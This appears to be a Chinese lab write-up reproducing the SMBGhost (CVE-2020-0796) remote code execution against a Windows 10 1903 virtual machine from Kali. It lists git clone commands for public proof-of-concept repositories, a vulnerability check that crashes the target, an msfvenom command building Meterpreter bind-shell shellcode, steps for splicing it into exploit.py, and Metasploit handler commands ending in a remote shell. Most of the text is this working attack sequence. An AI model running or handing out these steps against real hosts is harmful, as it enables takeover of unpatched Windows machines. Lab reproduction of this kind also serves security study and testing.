一,实验环境
攻击机:kail 192.168.227.132
靶机:win10 1903(关闭防火墙)192.168.227.137
二,复现过程
1,在kali终端下载 POC和Getshell
git clone https://github.com/eerykitty/CVE-2020-0796-PoC
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC
已经下载过会显示已存在,并保留在桌面上
![](https://i-blog.csdnimg.cn/blog_migrate/f1158c75b0980329a93e51819581cb5b.png)
![](https://i-blog.csdnimg.cn/blog_migrate/452054d5d72bb0beadbb861b2e7d0ca7.png)
![](https://i-blog.csdnimg.cn/blog_migrate/ece04a1fb37c4919dbda81a7f4bfd46b.png)
2,利用python脚本测试靶机是否存在永恒之黑漏洞
靶机IP如何获取这里就不演示了
python3 CVE-2020-0796.py 靶机IP
![](https://i-blog.csdnimg.cn/blog_migrate/073b45ad578241475e6bdf8133769367.png)
![](https://i-blog.csdnimg.cn/blog_migrate/de38d7977b23ea9853b98bc47655cfcf.png)
靶机出现蓝屏说明存在永恒之黑漏洞
3,使用msfvenom生成python类型(-f python)的shellcode.txt文件
msfconsole
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt
![](https://i-blog.csdnimg.cn/blog_migrate/86580cfd261ce53a3df50f36d2d11fe6.png)
1.打开桌面上的CVE-2020-0796-PoC文件夹中的shellcode.txt文件,复制全部内容。
2.打开桌面上的SMBGhost_RCE_PoC文件夹中的exploit.py,将其中的USER_PAYLOAD字段全部删除,将刚刚复制的shellcode.txt内容粘贴进去
3.将文件中的buf全部改为USER_PAYLOAD
![](https://i-blog.csdnimg.cn/blog_migrate/808780ae5fdae2c99ff8b6b0f17a2e1a.png)
![](https://i-blog.csdnimg.cn/blog_migrate/bba8615758f834aa7681ef5bf5abef2f.png)
![](https://i-blog.csdnimg.cn/blog_migrate/4389875825d383ff0ad58e85af922a4c.png)
![](https://i-blog.csdnimg.cn/blog_migrate/8343d3cb239fae06fe8f4277c2e419e0.png)
![](https://i-blog.csdnimg.cn/blog_migrate/7b39357d600e1956394368029289a0d8.png)
4,进入kali中的msf模块打开监听模块
use exploit/multi/handler #选择监听模块
set payload windows/x64/meterpreter/bind_tcp #使用监听模块
set lport 4444 #监听端口
set rhost 靶机IP #被监听主机
run #运行
![](https://i-blog.csdnimg.cn/blog_migrate/789acce4de75575722e240defe1ceabb.png)
![](https://i-blog.csdnimg.cn/blog_migrate/fd8ce09e1aa2715834d31dbba1d0da9d.png)
若最后一行代码迟迟加载不出来,可试着按下enter键
![](https://i-blog.csdnimg.cn/blog_migrate/9854e6803c3ee63ed134575637534953.png)
出现meterpreter >说明已经建立了一个会话连接
5,获取shell权限
shell
![](https://i-blog.csdnimg.cn/blog_migrate/f680582a9eb345977e731ad25bd09518.png)
攻击完成!